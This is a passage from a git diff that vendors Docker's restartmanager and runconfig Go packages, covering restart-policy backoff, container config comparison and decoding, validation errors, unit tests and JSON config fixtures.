+func New(policy container.RestartPolicy, restartCount int) RestartManager { + return &restartManager{policy: policy, restartCount: restartCount, cancel: make(chan struct{})} +} + +func (rm *restartManager) SetPolicy(policy container.RestartPolicy) { + rm.Lock() + rm.policy = policy + rm.Unlock() +} + +func (rm *restartManager) ShouldRestart(exitCode uint32, hasBeenManuallyStopped bool, executionDuration time.Duration) (bool, chan error, error) { + if rm.policy.IsNone() { + return false, nil, nil + } + rm.Lock() + unlockOnExit := true + defer func() { + if unlockOnExit { + rm.Unlock() + } + }() + + if rm.canceled { + return false, nil, ErrRestartCanceled + } + + if rm.active { + return false, nil, fmt.Errorf("invalid call on active restartmanager") + } + // if the container ran for more than 10s, regardless of status and policy reset the + // the timeout back to the default. + if executionDuration.Seconds() >= 10 { + rm.timeout = 0 + } + if rm.timeout == 0 { + rm.timeout = defaultTimeout + } else { + rm.timeout *= backoffMultiplier + } + + var restart bool + switch { + case rm.policy.IsAlways(): + restart = true + case rm.policy.IsUnlessStopped() && !hasBeenManuallyStopped: + restart = true + case rm.policy.IsOnFailure(): + // the default value of 0 for MaximumRetryCount means that we will not enforce a maximum count + if max := rm.policy.MaximumRetryCount; max == 0 || rm.restartCount < max { + restart = exitCode != 0 + } + } + + if !restart { + rm.active = false + return false, nil, nil + } + + rm.restartCount++ + + unlockOnExit = false + rm.active = true + rm.Unlock() + + ch := make(chan error) + go func() { + select { + case <-rm.cancel: + ch <- ErrRestartCanceled + close(ch) + case <-time.After(rm.timeout): + rm.Lock() + close(ch) + rm.active = false + rm.Unlock() + } + }() + + return true, ch, nil +} + +func (rm *restartManager) Cancel() error { + rm.Do(func() { + rm.Lock() + rm.canceled = true + close(rm.cancel) + rm.Unlock() + }) + return nil +} diff --git 
a/vendor/github.com/docker/docker/restartmanager/restartmanager_test.go b/vendor/github.com/docker/docker/restartmanager/restartmanager_test.go new file mode 100644 index 0000000000..20eced54d3 --- /dev/null +++ b/vendor/github.com/docker/docker/restartmanager/restartmanager_test.go @@ -0,0 +1,34 @@ +package restartmanager + +import ( + "testing" + "time" + + "github.com/docker/docker/api/types/container" +) + +func TestRestartManagerTimeout(t *testing.T) { + rm := New(container.RestartPolicy{Name: "always"}, 0).(*restartManager) + should, _, err := rm.ShouldRestart(0, false, 1*time.Second) + if err != nil { + t.Fatal(err) + } + if !should { + t.Fatal("container should be restarted") + } + if rm.timeout != 100*time.Millisecond { + t.Fatalf("restart manager should have a timeout of 100ms but has %s", rm.timeout) + } +} + +func TestRestartManagerTimeoutReset(t *testing.T) { + rm := New(container.RestartPolicy{Name: "always"}, 0).(*restartManager) + rm.timeout = 5 * time.Second + _, _, err := rm.ShouldRestart(0, false, 10*time.Second) + if err != nil { + t.Fatal(err) + } + if rm.timeout != 100*time.Millisecond { + t.Fatalf("restart manager should have a timeout of 100ms but has %s", rm.timeout) + } +} diff --git a/vendor/github.com/docker/docker/runconfig/compare.go b/vendor/github.com/docker/docker/runconfig/compare.go new file mode 100644 index 0000000000..708922f986 --- /dev/null +++ b/vendor/github.com/docker/docker/runconfig/compare.go @@ -0,0 +1,61 @@ +package runconfig + +import "github.com/docker/docker/api/types/container" + +// Compare two Config struct. 
Do not compare the "Image" nor "Hostname" fields +// If OpenStdin is set, then it differs +func Compare(a, b *container.Config) bool { + if a == nil || b == nil || + a.OpenStdin || b.OpenStdin { + return false + } + if a.AttachStdout != b.AttachStdout || + a.AttachStderr != b.AttachStderr || + a.User != b.User || + a.OpenStdin != b.OpenStdin || + a.Tty != b.Tty { + return false + } + + if len(a.Cmd) != len(b.Cmd) || + len(a.Env) != len(b.Env) || + len(a.Labels) != len(b.Labels) || + len(a.ExposedPorts) != len(b.ExposedPorts) || + len(a.Entrypoint) != len(b.Entrypoint) || + len(a.Volumes) != len(b.Volumes) { + return false + } + + for i := 0; i < len(a.Cmd); i++ { + if a.Cmd[i] != b.Cmd[i] { + return false + } + } + for i := 0; i < len(a.Env); i++ { + if a.Env[i] != b.Env[i] { + return false + } + } + for k, v := range a.Labels { + if v != b.Labels[k] { + return false + } + } + for k := range a.ExposedPorts { + if _, exists := b.ExposedPorts[k]; !exists { + return false + } + } + + for i := 0; i < len(a.Entrypoint); i++ { + if a.Entrypoint[i] != b.Entrypoint[i] { + return false + } + } + for key := range a.Volumes { + if _, exists := b.Volumes[key]; !exists { + return false + } + } + return true +} diff --git a/vendor/github.com/docker/docker/runconfig/compare_test.go b/vendor/github.com/docker/docker/runconfig/compare_test.go new file mode 100644 index 0000000000..6370d7a887 --- /dev/null +++ b/vendor/github.com/docker/docker/runconfig/compare_test.go @@ -0,0 +1,126 @@ +package runconfig + +import ( + "testing" + + "github.com/docker/docker/api/types/container" + "github.com/docker/docker/api/types/strslice" + "github.com/docker/go-connections/nat" +) + +// Just to make life easier +func newPortNoError(proto, port string) nat.Port { + p, _ := nat.NewPort(proto, port) + return p +} + +func TestCompare(t *testing.T) { + ports1 := make(nat.PortSet) + ports1[newPortNoError("tcp", "1111")] = struct{}{} + ports1[newPortNoError("tcp", "2222")] = struct{}{} + ports2 := 
make(nat.PortSet) + ports2[newPortNoError("tcp", "3333")] = struct{}{} + ports2[newPortNoError("tcp", "4444")] = struct{}{} + ports3 := make(nat.PortSet) + ports3[newPortNoError("tcp", "1111")] = struct{}{} + ports3[newPortNoError("tcp", "2222")] = struct{}{} + ports3[newPortNoError("tcp", "5555")] = struct{}{} + volumes1 := make(map[string]struct{}) + volumes1["/test1"] = struct{}{} + volumes2 := make(map[string]struct{}) + volumes2["/test2"] = struct{}{} + volumes3 := make(map[string]struct{}) + volumes3["/test1"] = struct{}{} + volumes3["/test3"] = struct{}{} + envs1 := []string{"ENV1=value1", "ENV2=value2"} + envs2 := []string{"ENV1=value1", "ENV3=value3"} + entrypoint1 := strslice.StrSlice{"/bin/sh", "-c"} + entrypoint2 := strslice.StrSlice{"/bin/sh", "-d"} + entrypoint3 := strslice.StrSlice{"/bin/sh", "-c", "echo"} + cmd1 := strslice.StrSlice{"/bin/sh", "-c"} + cmd2 := strslice.StrSlice{"/bin/sh", "-d"} + cmd3 := strslice.StrSlice{"/bin/sh", "-c", "echo"} + labels1 := map[string]string{"LABEL1": "value1", "LABEL2": "value2"} + labels2 := map[string]string{"LABEL1": "value1", "LABEL2": "value3"} + labels3 := map[string]string{"LABEL1": "value1", "LABEL2": "value2", "LABEL3": "value3"} + + sameConfigs := map[*container.Config]*container.Config{ + // Empty config + &container.Config{}: {}, + // Does not compare hostname, domainname & image + &container.Config{ + Hostname: "host1", + Domainname: "domain1", + Image: "image1", + User: "user", + }: { + Hostname: "host2", + Domainname: "domain2", + Image: "image2", + User: "user", + }, + // only OpenStdin + &container.Config{OpenStdin: false}: {OpenStdin: false}, + // only env + &container.Config{Env: envs1}: {Env: envs1}, + // only cmd + &container.Config{Cmd: cmd1}: {Cmd: cmd1}, + // only labels + &container.Config{Labels: labels1}: {Labels: labels1}, + // only exposedPorts + &container.Config{ExposedPorts: ports1}: {ExposedPorts: ports1}, + // only entrypoints + &container.Config{Entrypoint: entrypoint1}: 
{Entrypoint: entrypoint1}, + // only volumes + &container.Config{Volumes: volumes1}: {Volumes: volumes1}, + } + differentConfigs := map[*container.Config]*container.Config{ + nil: nil, + &container.Config{ + Hostname: "host1", + Domainname: "domain1", + Image: "image1", + User: "user1", + }: { + Hostname: "host1", + Domainname: "domain1", + Image: "image1", + User: "user2", + }, + // only OpenStdin + &container.Config{OpenStdin: false}: {OpenStdin: true}, + &container.Config{OpenStdin: true}: {OpenStdin: false}, + // only env + &container.Config{Env: envs1}: {Env: envs2}, + // only cmd + &container.Config{Cmd: cmd1}: {Cmd: cmd2}, + // not the same number of parts + &container.Config{Cmd: cmd1}: {Cmd: cmd3}, + // only labels + &container.Config{Labels: labels1}: {Labels: labels2}, + // not the same number of labels + &container.Config{Labels: labels1}: {Labels: labels3}, + // only exposedPorts + &container.Config{ExposedPorts: ports1}: {ExposedPorts: ports2}, + // not the same number of ports + &container.Config{ExposedPorts: ports1}: {ExposedPorts: ports3}, + // only entrypoints + &container.Config{Entrypoint: entrypoint1}: {Entrypoint: entrypoint2}, + // not the same number of parts + &container.Config{Entrypoint: entrypoint1}: {Entrypoint: entrypoint3}, + // only volumes + &container.Config{Volumes: volumes1}: {Volumes: volumes2}, + // not the same number of labels + &container.Config{Volumes: volumes1}: {Volumes: volumes3}, + } + for config1, config2 := range sameConfigs { + if !Compare(config1, config2) { + t.Fatalf("Compare should be true for [%v] and [%v]", config1, config2) + } + } + for config1, config2 := range differentConfigs { + if Compare(config1, config2) { + t.Fatalf("Compare should be false for [%v] and [%v]", config1, config2) + } + } +} diff --git a/vendor/github.com/docker/docker/runconfig/config.go b/vendor/github.com/docker/docker/runconfig/config.go new file mode 100644 index 0000000000..508681cfe0 --- /dev/null +++ 
b/vendor/github.com/docker/docker/runconfig/config.go @@ -0,0 +1,97 @@ +package runconfig + +import ( + "encoding/json" + "fmt" + "io" + + "github.com/docker/docker/api/types/container" + networktypes "github.com/docker/docker/api/types/network" + "github.com/docker/docker/pkg/sysinfo" + "github.com/docker/docker/volume" +) + +// ContainerDecoder implements httputils.ContainerDecoder +// calling DecodeContainerConfig. +type ContainerDecoder struct{} + +// DecodeConfig makes ContainerDecoder to implement httputils.ContainerDecoder +func (r ContainerDecoder) DecodeConfig(src io.Reader) (*container.Config, *container.HostConfig, *networktypes.NetworkingConfig, error) { + return DecodeContainerConfig(src) +} + +// DecodeHostConfig makes ContainerDecoder to implement httputils.ContainerDecoder +func (r ContainerDecoder) DecodeHostConfig(src io.Reader) (*container.HostConfig, error) { + return DecodeHostConfig(src) +} + +// DecodeContainerConfig decodes a json encoded config into a ContainerConfigWrapper +// struct and returns both a Config and a HostConfig struct +// Be aware this function is not checking whether the resulted structs are nil, +// it's your business to do so +func DecodeContainerConfig(src io.Reader) (*container.Config, *container.HostConfig, *networktypes.NetworkingConfig, error) { + var w ContainerConfigWrapper + + decoder := json.NewDecoder(src) + if err := decoder.Decode(&w); err != nil { + return nil, nil, nil, err + } + + hc := w.getHostConfig() + + // Perform platform-specific processing of Volumes and Binds. 
+ if w.Config != nil && hc != nil { + + // Initialize the volumes map if currently nil + if w.Config.Volumes == nil { + w.Config.Volumes = make(map[string]struct{}) + } + + // Now validate all the volumes and binds + if err := validateMountSettings(w.Config, hc); err != nil { + return nil, nil, nil, err + } + } + + // Certain parameters need daemon-side validation that cannot be done + // on the client, as only the daemon knows what is valid for the platform. + if err := ValidateNetMode(w.Config, hc); err != nil { + return nil, nil, nil, err + } + + // Validate isolation + if err := ValidateIsolation(hc); err != nil { + return nil, nil, nil, err + } + + // Validate QoS + if err := ValidateQoS(hc); err != nil { + return nil, nil, nil, err + } + + // Validate Resources + if err := ValidateResources(hc, sysinfo.New(true)); err != nil { + return nil, nil, nil, err + } + return w.Config, hc, w.NetworkingConfig, nil +} + +// validateMountSettings validates each of the volumes and bind settings +// passed by the caller to ensure they are valid. +func validateMountSettings(c *container.Config, hc *container.HostConfig) error { + // it is ok to have len(hc.Mounts) > 0 && (len(hc.Binds) > 0 || len (c.Volumes) > 0 || len (hc.Tmpfs) > 0 ) + + // Ensure all volumes and binds are valid. 
+ for spec := range c.Volumes { + if _, err := volume.ParseMountRaw(spec, hc.VolumeDriver); err != nil { + return fmt.Errorf("invalid volume spec %q: %v", spec, err) + } + } + for _, spec := range hc.Binds { + if _, err := volume.ParseMountRaw(spec, hc.VolumeDriver); err != nil { + return fmt.Errorf("invalid bind mount spec %q: %v", spec, err) + } + } + + return nil +} diff --git a/vendor/github.com/docker/docker/runconfig/config_test.go b/vendor/github.com/docker/docker/runconfig/config_test.go new file mode 100644 index 0000000000..f1f9de5950 --- /dev/null +++ b/vendor/github.com/docker/docker/runconfig/config_test.go @@ -0,0 +1,139 @@ +package runconfig + +import ( + "bytes" + "encoding/json" + "fmt" + "io/ioutil" + "runtime" + "strings" + "testing" + + "github.com/docker/docker/api/types/container" + networktypes "github.com/docker/docker/api/types/network" + "github.com/docker/docker/api/types/strslice" +) + +type f struct { + file string + entrypoint strslice.StrSlice +} + +func TestDecodeContainerConfig(t *testing.T) { + + var ( + fixtures []f + image string + ) + + //TODO: Should run for Solaris + if runtime.GOOS == "solaris" { + t.Skip() + } + + if runtime.GOOS != "windows" { + image = "ubuntu" + fixtures = []f{ + {"fixtures/unix/container_config_1_14.json", strslice.StrSlice{}}, + {"fixtures/unix/container_config_1_17.json", strslice.StrSlice{"bash"}}, + {"fixtures/unix/container_config_1_19.json", strslice.StrSlice{"bash"}}, + } + } else { + image = "windows" + fixtures = []f{ + {"fixtures/windows/container_config_1_19.json", strslice.StrSlice{"cmd"}}, + } + } + + for _, f := range fixtures { + b, err := ioutil.ReadFile(f.file) + if err != nil { + t.Fatal(err) + } + + c, h, _, err := DecodeContainerConfig(bytes.NewReader(b)) + if err != nil { + t.Fatal(fmt.Errorf("Error parsing %s: %v", f, err)) + } + + if c.Image != image { + t.Fatalf("Expected %s image, found %s\n", image, c.Image) + } + + if len(c.Entrypoint) != len(f.entrypoint) { + 
t.Fatalf("Expected %v, found %v\n", f.entrypoint, c.Entrypoint) + } + + if h != nil && h.Memory != 1000 { + t.Fatalf("Expected memory to be 1000, found %d\n", h.Memory) + } + } +} + +// TestDecodeContainerConfigIsolation validates isolation passed +// to the daemon in the hostConfig structure. Note this is platform specific +// as to what level of container isolation is supported. +func TestDecodeContainerConfigIsolation(t *testing.T) { + + // An invalid isolation level + if _, _, _, err := callDecodeContainerConfigIsolation("invalid"); err != nil { + if !strings.Contains(err.Error(), `invalid --isolation: "invalid"`) { + t.Fatal(err) + } + } + + // Blank isolation (== default) + if _, _, _, err := callDecodeContainerConfigIsolation(""); err != nil { + t.Fatal("Blank isolation should have succeeded") + } + + // Default isolation + if _, _, _, err := callDecodeContainerConfigIsolation("default"); err != nil { + t.Fatal("default isolation should have succeeded") + } + + // Process isolation (Valid on Windows only) + if runtime.GOOS == "windows" { + if _, _, _, err := callDecodeContainerConfigIsolation("process"); err != nil { + t.Fatal("process isolation should have succeeded") + } + } else { + if _, _, _, err := callDecodeContainerConfigIsolation("process"); err != nil { + if !strings.Contains(err.Error(), `invalid --isolation: "process"`) { + t.Fatal(err) + } + } + } + + // Hyper-V Containers isolation (Valid on Windows only) + if runtime.GOOS == "windows" { + if _, _, _, err := callDecodeContainerConfigIsolation("hyperv"); err != nil { + t.Fatal("hyperv isolation should have succeeded") + } + } else { + if _, _, _, err := callDecodeContainerConfigIsolation("hyperv"); err != nil { + if !strings.Contains(err.Error(), `invalid --isolation: "hyperv"`) { + t.Fatal(err) + } + } + } +} + +// callDecodeContainerConfigIsolation is a utility function to call +// DecodeContainerConfig for validating isolation +func callDecodeContainerConfigIsolation(isolation string) 
(*container.Config, *container.HostConfig, *networktypes.NetworkingConfig, error) { + var ( + b []byte + err error + ) + w := ContainerConfigWrapper{ + Config: &container.Config{}, + HostConfig: &container.HostConfig{ + NetworkMode: "none", + Isolation: container.Isolation(isolation)}, + } + if b, err = json.Marshal(w); err != nil { + return nil, nil, nil, fmt.Errorf("Error on marshal %s", err.Error()) + } + return DecodeContainerConfig(bytes.NewReader(b)) +} diff --git a/vendor/github.com/docker/docker/runconfig/config_unix.go b/vendor/github.com/docker/docker/runconfig/config_unix.go new file mode 100644 index 0000000000..4ccfc73be2 --- /dev/null +++ b/vendor/github.com/docker/docker/runconfig/config_unix.go @@ -0,0 +1,59 @@ +// +build !windows + +package runconfig + +import ( + "github.com/docker/docker/api/types/container" + networktypes "github.com/docker/docker/api/types/network" +) + +// ContainerConfigWrapper is a Config wrapper that holds the container Config (portable) +// and the corresponding HostConfig (non-portable). +type ContainerConfigWrapper struct { + *container.Config + InnerHostConfig *container.HostConfig `json:"HostConfig,omitempty"` + Cpuset string `json:",omitempty"` // Deprecated. Exported for backwards compatibility. + NetworkingConfig *networktypes.NetworkingConfig `json:"NetworkingConfig,omitempty"` + *container.HostConfig // Deprecated. Exported to read attributes from json that are not in the inner host config structure. +} + +// getHostConfig gets the HostConfig of the Config. 
+// It's mostly there to handle Deprecated fields of the ContainerConfigWrapper +func (w *ContainerConfigWrapper) getHostConfig() *container.HostConfig { + hc := w.HostConfig + + if hc == nil && w.InnerHostConfig != nil { + hc = w.InnerHostConfig + } else if w.InnerHostConfig != nil { + if hc.Memory != 0 && w.InnerHostConfig.Memory == 0 { + w.InnerHostConfig.Memory = hc.Memory + } + if hc.MemorySwap != 0 && w.InnerHostConfig.MemorySwap == 0 { + w.InnerHostConfig.MemorySwap = hc.MemorySwap + } + if hc.CPUShares != 0 && w.InnerHostConfig.CPUShares == 0 { + w.InnerHostConfig.CPUShares = hc.CPUShares + } + if hc.CpusetCpus != "" && w.InnerHostConfig.CpusetCpus == "" { + w.InnerHostConfig.CpusetCpus = hc.CpusetCpus + } + + if hc.VolumeDriver != "" && w.InnerHostConfig.VolumeDriver == "" { + w.InnerHostConfig.VolumeDriver = hc.VolumeDriver + } + + hc = w.InnerHostConfig + } + + if hc != nil { + if w.Cpuset != "" && hc.CpusetCpus == "" { + hc.CpusetCpus = w.Cpuset + } + } + + // Make sure NetworkMode has an acceptable value. We do this to ensure + // backwards compatible API behavior. + hc = SetDefaultNetModeIfBlank(hc) + + return hc +} diff --git a/vendor/github.com/docker/docker/runconfig/config_windows.go b/vendor/github.com/docker/docker/runconfig/config_windows.go new file mode 100644 index 0000000000..f2361b554b --- /dev/null +++ b/vendor/github.com/docker/docker/runconfig/config_windows.go @@ -0,0 +1,19 @@ +package runconfig + +import ( + "github.com/docker/docker/api/types/container" + networktypes "github.com/docker/docker/api/types/network" +) + +// ContainerConfigWrapper is a Config wrapper that holds the container Config (portable) +// and the corresponding HostConfig (non-portable). +type ContainerConfigWrapper struct { + *container.Config + HostConfig *container.HostConfig `json:"HostConfig,omitempty"` + NetworkingConfig *networktypes.NetworkingConfig `json:"NetworkingConfig,omitempty"` +} + +// getHostConfig gets the HostConfig of the Config. 
+func (w *ContainerConfigWrapper) getHostConfig() *container.HostConfig { + return w.HostConfig +} diff --git a/vendor/github.com/docker/docker/runconfig/errors.go b/vendor/github.com/docker/docker/runconfig/errors.go new file mode 100644 index 0000000000..bb72c1699c --- /dev/null +++ b/vendor/github.com/docker/docker/runconfig/errors.go @@ -0,0 +1,46 @@ +package runconfig + +import ( + "fmt" + + "github.com/docker/docker/api/errors" +) + +var ( + // ErrConflictContainerNetworkAndLinks conflict between --net=container and links + ErrConflictContainerNetworkAndLinks = fmt.Errorf("Conflicting options: container type network can't be used with links. This would result in undefined behavior") + // ErrConflictUserDefinedNetworkAndLinks conflict between --net= and links + ErrConflictUserDefinedNetworkAndLinks = fmt.Errorf("Conflicting options: networking can't be used with links. This would result in undefined behavior") + // ErrConflictSharedNetwork conflict between private and other networks + ErrConflictSharedNetwork = fmt.Errorf("Container sharing network namespace with another container or host cannot be connected to any other network") + // ErrConflictHostNetwork conflict from being disconnected from host network or connected to host network. 
+ ErrConflictHostNetwork = fmt.Errorf("Container cannot be disconnected from host network or connected to host network") + // ErrConflictNoNetwork conflict between private and other networks + ErrConflictNoNetwork = fmt.Errorf("Container cannot be connected to multiple networks with one of the networks in private (none) mode") + // ErrConflictNetworkAndDNS conflict between --dns and the network mode + ErrConflictNetworkAndDNS = fmt.Errorf("Conflicting options: dns and the network mode") + // ErrConflictNetworkHostname conflict between the hostname and the network mode + ErrConflictNetworkHostname = fmt.Errorf("Conflicting options: hostname and the network mode") + // ErrConflictHostNetworkAndLinks conflict between --net=host and links + ErrConflictHostNetworkAndLinks = fmt.Errorf("Conflicting options: host type networking can't be used with links. This would result in undefined behavior") + // ErrConflictContainerNetworkAndMac conflict between the mac address and the network mode + ErrConflictContainerNetworkAndMac = fmt.Errorf("Conflicting options: mac-address and the network mode") + // ErrConflictNetworkHosts conflict between add-host and the network mode + ErrConflictNetworkHosts = fmt.Errorf("Conflicting options: custom host-to-IP mapping and the network mode") + // ErrConflictNetworkPublishPorts conflict between the publish options and the network mode + ErrConflictNetworkPublishPorts = fmt.Errorf("Conflicting options: port publishing and the container type network mode") + // ErrConflictNetworkExposePorts conflict between the expose option and the network mode + ErrConflictNetworkExposePorts = fmt.Errorf("Conflicting options: port exposing and the container type network mode") + // ErrUnsupportedNetworkAndIP conflict between network mode and requested ip address + ErrUnsupportedNetworkAndIP = fmt.Errorf("User specified IP address is supported on user defined networks only") + // ErrUnsupportedNetworkNoSubnetAndIP conflict between network with no configured 
subnet and requested ip address + ErrUnsupportedNetworkNoSubnetAndIP = fmt.Errorf("User specified IP address is supported only when connecting to networks with user configured subnets") + // ErrUnsupportedNetworkAndAlias conflict between network mode and alias + ErrUnsupportedNetworkAndAlias = fmt.Errorf("Network-scoped alias is supported only for containers in user defined networks") + // ErrConflictUTSHostname conflict between the hostname and the UTS mode + ErrConflictUTSHostname = fmt.Errorf("Conflicting options: hostname and the UTS mode") +) + +func conflictError(err error) error { + return errors.NewRequestConflictError(err) +} diff --git a/vendor/github.com/docker/docker/runconfig/fixtures/unix/container_config_1_14.json b/vendor/github.com/docker/docker/runconfig/fixtures/unix/container_config_1_14.json new file mode 100644 index 0000000000..b08334c095 --- /dev/null +++ b/vendor/github.com/docker/docker/runconfig/fixtures/unix/container_config_1_14.json @@ -0,0 +1,30 @@ +{ + "Hostname":"", + "Domainname": "", + "User":"", + "Memory": 1000, + "MemorySwap":0, + "CpuShares": 512, + "Cpuset": "0,1", + "AttachStdin":false, + "AttachStdout":true, + "AttachStderr":true, + "PortSpecs":null, + "Tty":false, + "OpenStdin":false, + "StdinOnce":false, + "Env":null, + "Cmd":[ + "bash" + ], + "Image":"ubuntu", + "Volumes":{ + "/tmp": {} + }, + "WorkingDir":"", + "NetworkDisabled": false, + "ExposedPorts":{ + "22/tcp": {} + }, + "RestartPolicy": { "Name": "always" } +} diff --git a/vendor/github.com/docker/docker/runconfig/fixtures/unix/container_config_1_17.json b/vendor/github.com/docker/docker/runconfig/fixtures/unix/container_config_1_17.json new file mode 100644 index 0000000000..0d780877b4 --- /dev/null +++ b/vendor/github.com/docker/docker/runconfig/fixtures/unix/container_config_1_17.json @@ -0,0 +1,50 @@ +{ + "Hostname": "", + "Domainname": "", + "User": "", + "Memory": 1000, + "MemorySwap": 0, + "CpuShares": 512, + "Cpuset": "0,1", + "AttachStdin": false, + 
"AttachStdout": true, + "AttachStderr": true, + "Tty": false, + "OpenStdin": false, + "StdinOnce": false, + "Env": null, + "Cmd": [ + "date" + ], + "Entrypoint": "bash", + "Image": "ubuntu", + "Volumes": { + "/tmp": {} + }, + "WorkingDir": "", + "NetworkDisabled": false, + "MacAddress": "12:34:56:78:9a:bc", + "ExposedPorts": { + "22/tcp": {} + }, + "SecurityOpt": [""], + "HostConfig": { + "Binds": ["/tmp:/tmp"], + "Links": ["redis3:redis"], + "LxcConf": {"lxc.utsname":"docker"}, + "PortBindings": { "22/tcp": [{ "HostPort": "11022" }] }, + "PublishAllPorts": false, + "Privileged": false, + "ReadonlyRootfs": false, + "Dns": ["8.8.8.8"], + "DnsSearch": [""], + "DnsOptions": [""], + "ExtraHosts": null, + "VolumesFrom": ["parent", "other:ro"], + "CapAdd": ["NET_ADMIN"], + "CapDrop": ["MKNOD"], + "RestartPolicy": { "Name": "", "MaximumRetryCount": 0 }, + "NetworkMode": "bridge", + "Devices": [] + } +} diff --git a/vendor/github.com/docker/docker/runconfig/fixtures/unix/container_config_1_19.json b/vendor/github.com/docker/docker/runconfig/fixtures/unix/container_config_1_19.json new file mode 100644 index 0000000000..de49cf3242 --- /dev/null +++ b/vendor/github.com/docker/docker/runconfig/fixtures/unix/container_config_1_19.json @@ -0,0 +1,58 @@ +{ + "Hostname": "", + "Domainname": "", + "User": "", + "AttachStdin": false, + "AttachStdout": true, + "AttachStderr": true, + "Tty": false, + "OpenStdin": false, + "StdinOnce": false, + "Env": null, + "Cmd": [ + "date" + ], + "Entrypoint": "bash", + "Image": "ubuntu", + "Labels": { + "com.example.vendor": "Acme", + "com.example.license": "GPL", + "com.example.version": "1.0" + }, + "Volumes": { + "/tmp": {} + }, + "WorkingDir": "", + "NetworkDisabled": false, + "MacAddress": "12:34:56:78:9a:bc", + "ExposedPorts": { + "22/tcp": {} + }, + "HostConfig": { + "Binds": ["/tmp:/tmp"], + "Links": ["redis3:redis"], + "LxcConf": {"lxc.utsname":"docker"}, + "Memory": 1000, + "MemorySwap": 0, + "CpuShares": 512, + "CpusetCpus": "0,1", + 
"PortBindings": { "22/tcp": [{ "HostPort": "11022" }] }, + "PublishAllPorts": false, + "Privileged": false, + "ReadonlyRootfs": false, + "Dns": ["8.8.8.8"], + "DnsSearch": [""], + "DnsOptions": [""], + "ExtraHosts": null, + "VolumesFrom": ["parent", "other:ro"], + "CapAdd": ["NET_ADMIN"], + "CapDrop": ["MKNOD"], + "RestartPolicy": { "Name": "", "MaximumRetryCount": 0 }, + "NetworkMode": "bridge", + "Devices": [], + "Ulimits": [{}], + "LogConfig": { "Type": "json-file", "Config": {} }, + "SecurityOpt": [""], + "CgroupParent": "" + } +} diff --git a/vendor/github.com/docker/docker/runconfig/fixtures/unix/container_hostconfig_1_14.json b/vendor/github.com/docker/docker/runconfig/fixtures/unix/container_hostconfig_1_14.json new file mode 100644 index 0000000000..c72ac91cab --- /dev/null +++ b/vendor/github.com/docker/docker/runconfig/fixtures/unix/container_hostconfig_1_14.json @@ -0,0 +1,18 @@ +{ + "Binds": ["/tmp:/tmp"], + "ContainerIDFile": "", + "LxcConf": [], + "Privileged": false, + "PortBindings": { + "80/tcp": [ + { + "HostIp": "0.0.0.0", + "HostPort": "49153" + } + ] + }, + "Links": ["/name:alias"], + "PublishAllPorts": false, + "CapAdd": ["NET_ADMIN"], + "CapDrop": ["MKNOD"] +} diff --git a/vendor/github.com/docker/docker/runconfig/fixtures/unix/container_hostconfig_1_19.json b/vendor/github.com/docker/docker/runconfig/fixtures/unix/container_hostconfig_1_19.json new file mode 100644 index 0000000000..5ca8aa7e19 --- /dev/null +++ b/vendor/github.com/docker/docker/runconfig/fixtures/unix/container_hostconfig_1_19.json @@ -0,0 +1,30 @@ +{ + "Binds": ["/tmp:/tmp"], + "Links": ["redis3:redis"], + "LxcConf": {"lxc.utsname":"docker"}, + "Memory": 0, + "MemorySwap": 0, + "CpuShares": 512, + "CpuPeriod": 100000, + "CpusetCpus": "0,1", + "CpusetMems": "0,1", + "BlkioWeight": 300, + "OomKillDisable": false, + "PortBindings": { "22/tcp": [{ "HostPort": "11022" }] }, + "PublishAllPorts": false, + "Privileged": false, + "ReadonlyRootfs": false, + "Dns": ["8.8.8.8"], + 
"DnsSearch": [""], + "ExtraHosts": null, + "VolumesFrom": ["parent", "other:ro"], + "CapAdd": ["NET_ADMIN"], + "CapDrop": ["MKNOD"], + "RestartPolicy": { "Name": "", "MaximumRetryCount": 0 }, + "NetworkMode": "bridge", + "Devices": [], + "Ulimits": [{}], + "LogConfig": { "Type": "json-file", "Config": {} }, + "SecurityOpt": [""], + "CgroupParent": "" +} diff --git a/vendor/github.com/docker/docker/runconfig/fixtures/windows/container_config_1_19.json b/vendor/github.com/docker/docker/runconfig/fixtures/windows/container_config_1_19.json new file mode 100644 index 0000000000..724320c760 --- /dev/null +++ b/vendor/github.com/docker/docker/runconfig/fixtures/windows/container_config_1_19.json @@ -0,0 +1,58 @@ +{ + "Hostname": "", + "Domainname": "", + "User": "", + "AttachStdin": false, + "AttachStdout": true, + "AttachStderr": true, + "Tty": false, + "OpenStdin": false, + "StdinOnce": false, + "Env": null, + "Cmd": [ + "date" + ], + "Entrypoint": "cmd", + "Image": "windows", + "Labels": { + "com.example.vendor": "Acme", + "com.example.license": "GPL", + "com.example.version": "1.0" + }, + "Volumes": { + "c:/windows": {} + }, + "WorkingDir": "", + "NetworkDisabled": false, + "MacAddress": "12:34:56:78:9a:bc", + "ExposedPorts": { + "22/tcp": {} + }, + "HostConfig": { + "Binds": ["c:/windows:d:/tmp"], + "Links": ["redis3:redis"], + "LxcConf": {"lxc.utsname":"docker"}, + "Memory": 1000, + "MemorySwap": 0, + "CpuShares": 512, + "CpusetCpus": "0,1", + "PortBindings": { "22/tcp": [{ "HostPort": "11022" }] }, + "PublishAllPorts": false, + "Privileged": false, + "ReadonlyRootfs": false, + "Dns": ["8.8.8.8"], + "DnsSearch": [""], + "DnsOptions": [""], + "ExtraHosts": null, + "VolumesFrom": ["parent", "other:ro"], + "CapAdd": ["NET_ADMIN"], + "CapDrop": ["MKNOD"], + "RestartPolicy": { "Name": "", "MaximumRetryCount": 0 }, + "NetworkMode": "default", + "Devices": [], + "Ulimits": [{}], + "LogConfig": { "Type": "json-file", "Config": {} }, + "SecurityOpt": [""], + "CgroupParent": 
"" + } +} diff --git a/vendor/github.com/docker/docker/runconfig/hostconfig.go b/vendor/github.com/docker/docker/runconfig/hostconfig.go new file mode 100644 index 0000000000..2b81d02c20 --- /dev/null +++ b/vendor/github.com/docker/docker/runconfig/hostconfig.go @@ -0,0 +1,35 @@ +package runconfig + +import ( + "encoding/json" + "io" + + "github.com/docker/docker/api/types/container" +) + +// DecodeHostConfig creates a HostConfig based on the specified Reader. +// It assumes the content of the reader will be JSON, and decodes it. +func DecodeHostConfig(src io.Reader) (*container.HostConfig, error) { + decoder := json.NewDecoder(src) + + var w ContainerConfigWrapper + if err := decoder.Decode(&w); err != nil { + return nil, err + } + + hc := w.getHostConfig() + return hc, nil +} + +// SetDefaultNetModeIfBlank changes the NetworkMode in a HostConfig structure +// to default if it is not populated. This ensures backwards compatibility after +// the validation of the network mode was moved from the docker CLI to the +// docker daemon. +func SetDefaultNetModeIfBlank(hc *container.HostConfig) *container.HostConfig { + if hc != nil { + if hc.NetworkMode == container.NetworkMode("") { + 